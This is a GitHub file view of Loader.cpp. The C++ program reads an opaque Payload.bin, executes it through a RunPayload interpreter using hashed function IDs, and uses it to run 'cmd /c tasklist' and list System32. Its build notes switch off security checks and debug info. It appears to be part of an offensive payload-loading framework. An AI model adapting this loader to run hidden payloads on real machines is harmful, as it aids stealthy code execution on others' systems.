-
Notifications
You must be signed in to change notification settings - Fork 71
Expand file tree
/
Copy pathLoader.cpp
More file actions
48 lines (44 loc) · 1.71 KB
/
Loader.cpp
File metadata and controls
48 lines (44 loc) · 1.71 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#include "Interpreter.h"
/*
* ⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️
* 1.Release x64
* 2.常规
* 平台工具集(LLVM (clang-cl))
* 3.C/C++
* 优化: 优化(已禁用)
* 代码生成: 运行库(多线程); 安全检查(禁用安全检查)
* 4.链接器
* 清单文件: 生成清单(否)
* 调试: 生成调试信息(否)
*/
int main() {
// 读取 Payload
HANDLE hFile = CreateFileA("..\\Converter\\Payload.bin", GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
cout << "Failed to open Payload.bin." << endl;
return 0;
}
DWORD payloadSize = GetFileSize(hFile, NULL);
PVOID pPayload = malloc(payloadSize);
if (pPayload == NULL) {
return 0;
}
DWORD readFileLen;
ReadFile(hFile, pPayload, payloadSize, &readFileLen, NULL);
char* commandPara = "cmd /c tasklist";
int commandParaLen = strlen(commandPara) + 1;
char* outputData;
int outputDataLen = 0;
PVOID specialParaList[] = { NULL };
if (RunPayload((PBYTE)pPayload, payloadSize, -504283653, commandPara, commandParaLen, outputData, outputDataLen, specialParaList) && outputDataLen > 0) {
*(outputData + outputDataLen) = '\0';
cout << outputData << endl;
}
commandPara = "C:\\Windows\\System32\\*";
commandParaLen = strlen(commandPara) + 1;
outputDataLen = 0;
if (RunPayload((PBYTE)pPayload, payloadSize, 1280936002, commandPara, commandParaLen, outputData, outputDataLen, specialParaList) && outputDataLen > 0) {
*(outputData + outputDataLen) = '\0';
cout << outputData << endl;
}
}